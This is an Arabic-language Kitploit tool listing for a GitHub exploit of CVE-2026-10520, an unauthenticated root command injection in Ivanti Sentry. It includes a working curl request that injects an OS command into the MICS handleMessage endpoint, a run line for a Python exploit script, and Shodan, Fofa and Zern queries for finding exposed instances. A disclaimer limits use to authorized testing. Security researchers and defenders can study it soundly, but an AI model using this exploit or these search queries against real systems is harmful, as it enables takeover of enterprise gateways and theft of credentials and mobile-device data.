Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-10520 — RCE على مستوى الجذر عبر حقن أوامر نظام التشغيل في Ivanti Sentry | Kitploit
أدوات/GitHubGitHub/error-inside/cve-2026-10520
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليم
GitHuberror-inside/cve-2026-10520

CVE-2026-10520

RCE على مستوى الجذر عبر حقن أوامر نظام التشغيل في Ivanti Sentry

عرض المستودع
1منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-10520

Python CVSS License Educational

إيفانتي سينتري (المعروف سابقًا باسم MobileIron Sentry) هو بوابة أمنية للمؤسسات تقوم بوكالة حركة المرور بين الأجهزة المحمولة وموارد الخلفية المؤسسية: البريد الإلكتروني وSharePoint وتطبيقات الويب الداخلية. يفرض سياسات إدارة الأجهزة المحمولة (MDM)، وينهي جلسات الأجهزة المحمولة المشفرة، ويصدر مصادقة تعتمد على الشهادات لنشر التطبيقات المؤسسية. عادةً ما تكون مثيلات Sentry مواجهة للإنترنت على المنفذ 8443، مما يعرض واجهة برمجة تطبيقات إدارة MICS (خدمة تكوين Mobile Iron).

CVE-2026-10520 هي ثغرة حقن أوامر نظام التشغيل غير مصادق عليها تؤثر على Ivanti Sentry قبل الإصدارات R10.5.2 وR10.6.2 وR10.7.1 (CVSSv3.1: 10 حرج، مدرجة في CISA KEV). يقع الخلل في نقطة نهاية MICS API /mics/api/v2/sentry/mics-config/handleMessage، والتي تقبل أوامر النظام المغلفة بـ XML عبر جسم message مشفر بعنوان URL دون أي مصادقة أو التحقق من صحة المدخلات. يمكن للمهاجم الذي يصل إلى نقطة نهاية ضعيفة تنفيذ أوامر نظام تشغيل عشوائية كـ ، والحصول على سيطرة كاملة على المضيف — بما في ذلك حركة مرور المؤسسة المفكوكة، وبيانات الاعتماد المخزنة، وجميع بيانات الأجهزة المحمولة المدارة.

POST
root

PoC

root@kitploit:~
# Inject 'id' command via MICS handleMessage endpoint (no authentication required)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Connection: close" \
  --data-urlencode "message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>"

الاستخدام

root@kitploit:~
python CVE-2026-10520-X7.py
  • Zern : title:"Ivanti System Manager: Sign In"
  • Fofa : body="sentry" && body="System Manager" && port="8443", title="Ivanti System Manager: Sign In", icon_hash=="1407597555"
  • Shodan : http.html:"Ivanti Standalone Sentry System Manager" port:8443 , http.title:Ivanti port:8443, http.html:"Ivanti" http.html:"Sentry" port:8443

الموارد

  • OpenCVE — RCE على مستوى الجذر عبر حقن أوامر نظام التشغيل في Ivanti Sentry
  • NIST — تفاصيل CVE-2026-10520
  • Ivanti Sentry — صفحة المنتج الرسمية

إخلاء المسؤولية

هذا المستودع ومحتوياته متوفرة حصريًا لأغراض البحث الأمني المشروع، واختبار الاختراق المصرح به، والدراسة التعليمية، والأغراض الدفاعية. من خلال الوصول إلى هذه المواد أو استخدامها، فإنك تقر بالمسؤولية الكاملة عن ضمان امتثال أنشطتك لجميع القوانين المعمول بها وأنك حصلت على الإذن المناسب قبل اختبار أو تطبيق هذه التقنيات على أي نظام لا تملكه.

لا يتحمل مؤلفو هذا المشروع والمشرفون عليه أي مسؤولية عن أي أضرار أو عواقب قانونية أو سوء استخدام ناتج عن تطبيق هذه المعلومات. أي استخدام للوصول غير المصرح به أو النشاط الضار أو الأغراض غير القانونية محظور صراحة وغير مدعوم.

استخدم بمسؤولية. ابق قانونيًا. اختبر فقط ما تملكه أو لديك إذن كتابي صريح لاختباره.

المؤلفون

  • ErrorInside // SCT

الترخيص

SCT-PL

تنزيل الأداة